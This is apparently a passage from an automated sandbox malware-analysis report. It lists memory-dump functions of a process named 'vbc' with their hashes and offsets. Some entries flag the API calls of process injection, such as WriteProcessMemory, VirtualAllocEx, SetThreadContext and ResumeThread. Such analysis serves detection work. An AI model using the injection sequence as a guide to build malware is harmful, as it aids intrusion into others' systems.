Opcode ID: 62a3609d040545577e3d90d5a910f8b046de3c3e45b3ed978cc47924e1468ca0
Instruction ID: ba0b1d1a5097bd7d9249ee599d5839946d1a05a665701c08b421aa2da78a9484
Opcode Fuzzy Hash: 62a3609d040545577e3d90d5a910f8b046de3c3e45b3ed978cc47924e1468ca0
Instruction Fuzzy Hash: 10A1E670E05228CFEF10CFA9D9447AEBBB1FF49300F6090AAD409A7251D7785A86DF59

Uniqueness

Uniqueness Score: -1.00%

Function 0042B5A0, Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 092b52cb80fe7b72e660a7ccde9e9991690856608de0fbf46a76ce44bf4f57d5
Instruction ID: 0486b2d5c6049e4cfcd4887d1d1f1219dd8f430eb811537c189b0ed49223f4bd
Opcode Fuzzy Hash: 092b52cb80fe7b72e660a7ccde9e9991690856608de0fbf46a76ce44bf4f57d5
Instruction Fuzzy Hash: 0A91E5B4E042298BCF10CFA9D5446AEFBF2FF89300F64842AD415A7341D7749985CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0042AFC1, Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f47880a3388e53699eb937839117076fbb6ad7e3cde472ac96ebd80600b1d513
Instruction ID: f133917210d545c2ec27d91bf1bfed73015777a2842cbc90f1a960bad4dd3e2e
Opcode Fuzzy Hash: f47880a3388e53699eb937839117076fbb6ad7e3cde472ac96ebd80600b1d513
Instruction Fuzzy Hash: 0D81D570E05228CFEF10CFA9D9447AEBBF1FB49300F6090AAD409A7251D7785A86DF59

Uniqueness

Uniqueness Score: -1.00%

Function 0042AE28, Relevance: 2.6, Strings: 2, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PSp, xrefs: 0042AEC1
PSp, xrefs: 0042AEB1

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID: PSp$PSp
API String ID: 0-3241751829
Opcode ID: 7530ba474812ee50c83560c7390010456b1c3d018bb0ff39ad4fd7759883129f
Instruction ID: c752a5495870f9fc30410fa8400236585ed715120ab58784c872b4526b0c6bff
Opcode Fuzzy Hash: 7530ba474812ee50c83560c7390010456b1c3d018bb0ff39ad4fd7759883129f
Instruction Fuzzy Hash: 18210774E04219DFCF04DFA9D8446EEBBB1BB49300F61842AD815B3310E7385A42DF96

Uniqueness

Uniqueness Score: -1.00%

Function 00FADB48, Relevance: 1.8, APIs: 1, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00FADE0F

Memory Dump Source

Source File: 00000004.00000002.465765043.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_vbc.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8a621252c2738f42c2d5fae423bf957622203832b4756433fd67263421cbe214
Instruction ID: 5edb63cd64a52383b404790d4447d3f7b194c944999c505926b46eadd47cd08b
Opcode Fuzzy Hash: 8a621252c2738f42c2d5fae423bf957622203832b4756433fd67263421cbe214
Instruction Fuzzy Hash: EFC116B0D0021D8FDB20DFA4C841BEDBBB1BF49314F0095A9E91AB7640EB749A85DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00FAD6C0, Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00FAD793

Memory Dump Source

Source File: 00000004.00000002.465765043.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_vbc.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: eef4eff49a2e46232026f10a7074053d47bc0c0bd90f5d3a26286dcaef62af73
Instruction ID: 37d3503c78917d3fd07d857250b6e44199a0ae636282ae50a9a947edb765998e
Opcode Fuzzy Hash: eef4eff49a2e46232026f10a7074053d47bc0c0bd90f5d3a26286dcaef62af73
Instruction Fuzzy Hash: C841BBB4D012489FCF04CFA9D884AEEFBF1BB49314F20942AE815B7200D774AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00FAD870, Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00FAD922

Memory Dump Source

Source File: 00000004.00000002.465765043.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_vbc.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 8b447aa614fbe963d25cab5c666f9a2c92e668437fcbe4e08fd59fd339bd7952
Instruction ID: 728b64cd607c8c5fc48e03cf7e0c40cf74908dfe1c3e6a1e9bbccf923b001538
Opcode Fuzzy Hash: 8b447aa614fbe963d25cab5c666f9a2c92e668437fcbe4e08fd59fd339bd7952
Instruction Fuzzy Hash: 7341BAB4D042589FCF10CFA9D884AEEFBB1BF49310F10942AE815B7200D775A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00FAD548, Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00FAD5F2

Memory Dump Source

Source File: 00000004.00000002.465765043.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_vbc.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9c004bddd37feb1ddb06f7ff051c00ecbc7a09febadada513bffe18005dfe46f
Instruction ID: de69ffedd88c59f6d39b2e223fe114eca636b4e7130ee9d7e685aa773dc2069a
Opcode Fuzzy Hash: 9c004bddd37feb1ddb06f7ff051c00ecbc7a09febadada513bffe18005dfe46f
Instruction Fuzzy Hash: 244199B4D042589FCF10CFA9D884ADEBBB1BF49314F10942AE815BB310D775A905CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00FAD288, Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00FAD337

Memory Dump Source

Source File: 00000004.00000002.465765043.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_vbc.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 3bb445b899c8de0835597b7f1fd2b2232158da6931b586de79ffdf36dcb54093
Instruction ID: b8a7cdfc321dbd6de5c31644aac9c20a3f6f0bf7a413dc546f7d4d6f6ed017aa
Opcode Fuzzy Hash: 3bb445b899c8de0835597b7f1fd2b2232158da6931b586de79ffdf36dcb54093
Instruction Fuzzy Hash: 0E41ACB5D012589FCB10CFA9D884AEEBBB1BF49314F14842AE415B7240D779AA45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00FAD148, Relevance: 1.6, APIs: 1, Instructions: 75
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 00FAD1C6

Memory Dump Source

Source File: 00000004.00000002.465765043.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_vbc.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 80679e992a00ad267f41dd5b6afad48d2c76adf1fe9d63410038d32e95992745
Instruction ID: 627494fa3bd0b9d062aaf06a37dfa73030f7269a4a0792aec007249f567f074e
Opcode Fuzzy Hash: 80679e992a00ad267f41dd5b6afad48d2c76adf1fe9d63410038d32e95992745
Instruction Fuzzy Hash: F43199B4D012189FCF14CFA9E884AAEFBB5AF49314F14942AE815B7340D775A901CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0042AE27, Relevance: 1.3, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PSp, xrefs: 0042AEB1

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID: PSp
API String ID: 0-91523618
Opcode ID: c0d194bbbe17291d221e24decbbf89e570541d613529e8dfb57fef0c8539e689
Instruction ID: d2b8c3086d80105a9f7fae0c91d67a6be51097c5943fe0b93331bc9873ac2e4e
Opcode Fuzzy Hash: c0d194bbbe17291d221e24decbbf89e570541d613529e8dfb57fef0c8539e689
Instruction Fuzzy Hash: 2921F474E04219DFCF04DFA9D8446EEBBB1BB49300F21852AD815B3350E7384A42DF96

Uniqueness

Uniqueness Score: -1.00%

Function 00429312, Relevance: .4, Instructions: 411COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11fbd7ef73bf545b08d4bd66d10e60f5652c73e626f8379e6adf51570675c13a
Instruction ID: 33b0a3b4b57919ab80acc11cfb7a5946c530e8005918331aa89f8d275deecb97
Opcode Fuzzy Hash: 11fbd7ef73bf545b08d4bd66d10e60f5652c73e626f8379e6adf51570675c13a
Instruction Fuzzy Hash: D7021334A00219CFCB04DFB4C595EADB7B2FF8A304F2585A9E505AB365DB35AD42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00425618, Relevance: .4, Instructions: 409COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a28a8b911fcb2076067b73b4268070eda5766f25ce0abcb6743a150f9abb651f
Instruction ID: 6b058d5b27d8349b3f63b398aae9a2085feb9e0136c1359e2dfcb89de3b7330f
Opcode Fuzzy Hash: a28a8b911fcb2076067b73b4268070eda5766f25ce0abcb6743a150f9abb651f
Instruction Fuzzy Hash: E0022334A00219CFCB04DFB4C595EAEB7B2FF8A304F2585A9E505AB365DB35AD42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0042CB78, Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d78c802f461292f3a54c135374eb4fa6091e6bdfc495b0ec3a76eb3af3c983cb
Instruction ID: 8446cb49aa3b4222287eedca3d22e569f0358cadc36e0a1d069682fdf65145d7
Opcode Fuzzy Hash: d78c802f461292f3a54c135374eb4fa6091e6bdfc495b0ec3a76eb3af3c983cb
Instruction Fuzzy Hash: DB214F3094E3D45FDB03977898A49CD7FB05F13285F4A41DBC095DB263D2298949C762

Uniqueness

Uniqueness Score: -1.00%

Function 0042B59A, Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66d32f15375a3e3693da84aa270bba8acb2c80c4a3ebb57c017921067206f4c4
Instruction ID: c852f59cbe3b16a7e66c3aa1248f8f471399f57479b475fa166477913208a204
Opcode Fuzzy Hash: 66d32f15375a3e3693da84aa270bba8acb2c80c4a3ebb57c017921067206f4c4
Instruction Fuzzy Hash: C361F770E05228CFDF14CFAAD5446EEBBB2FB89300F24C42AD419A7251D7789945CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0042A782, Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 559ff01142d43d1926bc2bcac6b1cd1549634a90468410cd59c72a4f1a2d4127
Instruction ID: 68f84b4aa5a9550c10486a5a1fdb884aac1b1d285e5ffbfa6939c401b27b1db4
Opcode Fuzzy Hash: 559ff01142d43d1926bc2bcac6b1cd1549634a90468410cd59c72a4f1a2d4127
Instruction Fuzzy Hash: 1A7106B0E04268CFCB14DFA9D8546AEBBF1FF89300F61842AD805A7365DB745985CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0042A790, Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c5b27f62f52c0aadb2d82f375207db7d6c58bc496acbfff079eea58d8ede887
Instruction ID: a3e0b40d4b3d64a07e57ff85790a0271761cb4d596547827330226589800bd1d
Opcode Fuzzy Hash: 6c5b27f62f52c0aadb2d82f375207db7d6c58bc496acbfff079eea58d8ede887
Instruction Fuzzy Hash: D261E6B0E00228CFDB14DFA9E8546AEBBB1FF49304F61842AD815B7364DB745985CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0042AA97, Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86c8c0f7f62cfde15c68192929bf16209f5cf10d1d410259c3923e43e73eb15f
Instruction ID: c96abef1abde6660130251fa4a5705bd9a4e3d74b81476719c01bfb22c6c731b
Opcode Fuzzy Hash: 86c8c0f7f62cfde15c68192929bf16209f5cf10d1d410259c3923e43e73eb15f
Instruction Fuzzy Hash: 8751FA74E05229CFDB04CFAAE9446EEBBB2BF89300F60802AD815B7350D7785956CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00420160, Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fe95723f8e741070302f648f297f83bd97712063e2dee6cc1d66bbec0d17c3d
Instruction ID: 32fa6715a903c7088b58ef87d6c5c705ab2345edf800a5d236b97d81ad50c91c
Opcode Fuzzy Hash: 2fe95723f8e741070302f648f297f83bd97712063e2dee6cc1d66bbec0d17c3d
Instruction Fuzzy Hash: 5351E3B0E04229CFCB04CFA9D980AADFBF2BF88304F15856AE409A7355D734AD41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0042CF04, Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f589d30dae302e8308de569ea9b19519af474fd9b7d2039e6766dad4597f70b7
Instruction ID: a6a0d55f5883f843629f849a520b168bf1be49780a65f71c8ac2f37ab53d2377
Opcode Fuzzy Hash: f589d30dae302e8308de569ea9b19519af474fd9b7d2039e6766dad4597f70b7
Instruction Fuzzy Hash: 8351F470E10258DFDB50DFA8E948B9DBBF1FB49304F0181AAD809AB390EB749981CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004298D2, Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1885b190c13f58fe9a7693e5bfcf9b51e37b6a6e0f6ffc50e0f6ff509fe3bbf9
Instruction ID: 36de6c2a36e9eee8695515586a511ba57a65c9894dbab4d82e947d673772d94c
Opcode Fuzzy Hash: 1885b190c13f58fe9a7693e5bfcf9b51e37b6a6e0f6ffc50e0f6ff509fe3bbf9
Instruction Fuzzy Hash: F2217571E08259CFCB05CFA9D8406EEBBF1EF8A304F08806AD409E7352D7385A46CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00420923, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89e5dd3a46ac1e43cc14cae34f9a1c214a041ef521d1d480183c9aa5484e36df
Instruction ID: 0c37bdaf7bb887fdf0ea9f676e23d6566761d115b5b035ee5d0c8df518856361
Opcode Fuzzy Hash: 89e5dd3a46ac1e43cc14cae34f9a1c214a041ef521d1d480183c9aa5484e36df
Instruction Fuzzy Hash: 7D318270E04248AFC705EBB8C551AAEBBB1AF8A300F2581EED044E7362CB355E44DB55

Uniqueness

Uniqueness Score: -1.00%

Function 0018D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464427056.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_18d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 179f696809f924e806838304a842f2009b21b096a8d9d6d308ff1fcbf109d08a
Instruction ID: 3ad00643eb152293fb04804d62af3e0f8a63a3554f338e53df4682f663c05bc8
Opcode Fuzzy Hash: 179f696809f924e806838304a842f2009b21b096a8d9d6d308ff1fcbf109d08a
Instruction Fuzzy Hash: 3221F575608344DFDB14EF20E884B1ABB61EB88318F30C569E9094B286C73AD906CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0018D1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464427056.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_18d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88e9c18f81a981450c6f9dbfce1df0f2f93a7cfc2349fb13512662ff3748ba3b
Instruction ID: 9f7a2c50a4510b9b3ca50e8b5a7c995fd62c9ac6d3b7d455738f9b3b9498c578
Opcode Fuzzy Hash: 88e9c18f81a981450c6f9dbfce1df0f2f93a7cfc2349fb13512662ff3748ba3b
Instruction Fuzzy Hash: CB210775508344EFDB05EF10E5C4B2ABBA2FB88318F20C56DE9094B286C336D906CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00420150, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 343a2d426c198660013d63da6aab71d74cb241247b1bb7882bb5a7dfb73eabaa
Instruction ID: 5b25275a04547fde7c3390a823bb49d5a941323831776d20aa3069d84b4c4cf8
Opcode Fuzzy Hash: 343a2d426c198660013d63da6aab71d74cb241247b1bb7882bb5a7dfb73eabaa
Instruction Fuzzy Hash: FE211A70E00118EFC744EBB8D541AAEB7F2EF89304F6085A9E419B7361DB356E44DB98

Uniqueness

Uniqueness Score: -1.00%

Function 0042A5C8, Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc06659fd4213ec4343dc4911de192c4f8b6885670f96e700405b6cebed5bebe
Instruction ID: c57002371ee77608feb233e0f5cc3d15aa01e16ca0c7c25da1eaca826831ea1d
Opcode Fuzzy Hash: bc06659fd4213ec4343dc4911de192c4f8b6885670f96e700405b6cebed5bebe
Instruction Fuzzy Hash: 4E216F71E04228DBCB009FA4E8187EEB7B4FB0A311F545016D846A3250C7794995DF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0042CDC0, Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c146b0f7f03988e309b18021aa459fd5c3b06ceb928c1471737ae4a0456440a
Instruction ID: 73bdc965873aa3213764125378385ba1034b35441051c88fdadf64377fb0f739
Opcode Fuzzy Hash: 9c146b0f7f03988e309b18021aa459fd5c3b06ceb928c1471737ae4a0456440a
Instruction Fuzzy Hash: 67312A30A11268DFDB60DF24D848BACBBB1FB4A345F0085EAD509A7294DB745A81CF12

Uniqueness

Uniqueness Score: -1.00%

Function 0042A5C7, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d84bff3f8d0fb9de5e5fadd5cc3c74fbe990625a886dda3e1a5f0921dad557b
Instruction ID: af5c11ccd74ec9963de817b1611c64d29ed62267375b0ee03556846830c787da
Opcode Fuzzy Hash: 0d84bff3f8d0fb9de5e5fadd5cc3c74fbe990625a886dda3e1a5f0921dad557b
Instruction Fuzzy Hash: 64117F71E04228DFCB10DFA4E8586EEBBB4FB4A311F64501AD846A3350C7794995CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0018D017, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464427056.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_18d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae0d2756050860a682f55fd60858f3ae261f8a767e1dfdbfe973c6fca6b5e31b
Instruction ID: 228cf0e89412b303fba9d0c34e37e4c0fd20adc39d2a519509e7e19385aa3277
Opcode Fuzzy Hash: ae0d2756050860a682f55fd60858f3ae261f8a767e1dfdbfe973c6fca6b5e31b
Instruction Fuzzy Hash: F511BE75508384CFCB11CF10E584B15BB61FB44314F24C6A9E8094B696C33AD90ACF61

Uniqueness

Uniqueness Score: -1.00%

Function 0018D1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464427056.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_18d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae0d2756050860a682f55fd60858f3ae261f8a767e1dfdbfe973c6fca6b5e31b
Instruction ID: 0ba50816e394b9865a0cd170841a31f0827e461ac2be4a64da549cbe77563cb4
Opcode Fuzzy Hash: ae0d2756050860a682f55fd60858f3ae261f8a767e1dfdbfe973c6fca6b5e31b
Instruction Fuzzy Hash: 9F11BB75504384DFCB02DF10E5C4B15BBA2FB84314F24C6A9D8094B296C33AD90ACF62

Uniqueness

Uniqueness Score: -1.00%

Function 0017D1D5, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464387754.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_17d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5630745314a2c32023c05fc77479dc97486828a4b4493670583412d36417f8fd
Instruction ID: ba8c1441997d239439f91f3c703a31d029bfbcbabce2004cc4e2a601f6ae17a3
Opcode Fuzzy Hash: 5630745314a2c32023c05fc77479dc97486828a4b4493670583412d36417f8fd
Instruction Fuzzy Hash: 7901F7740083489AD7104A16D884B27BBF8DF41364F25C45AED085B187C778EC02C771

Uniqueness

Uniqueness Score: -1.00%

Function 004292B2, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3e9eeb0cc1350cf1fb0e257b55164f05d576e4b32e8cacee20299a72ba7f694
Instruction ID: f4b4e5fd6b8345e4c9872cf161a5ea7b58e6fc7b9416131b21d64daaa57fda1f
Opcode Fuzzy Hash: e3e9eeb0cc1350cf1fb0e257b55164f05d576e4b32e8cacee20299a72ba7f694
Instruction Fuzzy Hash: 75F0C23090D2849FD306DB64D855AA9BFB49F43204F1A81EBD088DB1A3D7344E48C365

Uniqueness

Uniqueness Score: -1.00%

Function 00420438, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c38e3446c85ab280756fd302d49728a0e758a3984600d8f12734451e03d069df
Instruction ID: 338982c4f015501051cab3970762a325e24b67d3e6ccff418dd46130c2fbc38e
Opcode Fuzzy Hash: c38e3446c85ab280756fd302d49728a0e758a3984600d8f12734451e03d069df
Instruction Fuzzy Hash: 0CF08220549248AFC716FBB09851AAE7BA4CF43214B1104AED549E72A3DA394E44D7A6

Uniqueness

Uniqueness Score: -1.00%

Function 0042D482, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d36c779aaf3919a3f1b9483f42db0c389038a60514bfb4a03a183cabdd4375a
Instruction ID: 76f77cf0e0731fcc40bca1fe82bf11fe892820bafce9c7b9facf631bf3aeb8b3
Opcode Fuzzy Hash: 6d36c779aaf3919a3f1b9483f42db0c389038a60514bfb4a03a183cabdd4375a
Instruction Fuzzy Hash: 8811F330900229DFDB60DF64E848B5CBBB1FB49305F50C4A9C449A7254DF749A858F55

Uniqueness

Uniqueness Score: -1.00%

Function 0017D1D4, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464387754.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_17d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24b1e5f9c7f03e58a890b380d4fe1b7fc093c68c48a298c5a501b2de3ff15444
Instruction ID: 048b95394a9a14d5f47fcd59f18c11d6d906ee59500c24a9cf652d2e5377241d
Opcode Fuzzy Hash: 24b1e5f9c7f03e58a890b380d4fe1b7fc093c68c48a298c5a501b2de3ff15444
Instruction Fuzzy Hash: 8FF062754087449AEB108E16D888B63FFA8EF95764F28C45AED485B287C378EC45CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0042D309, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
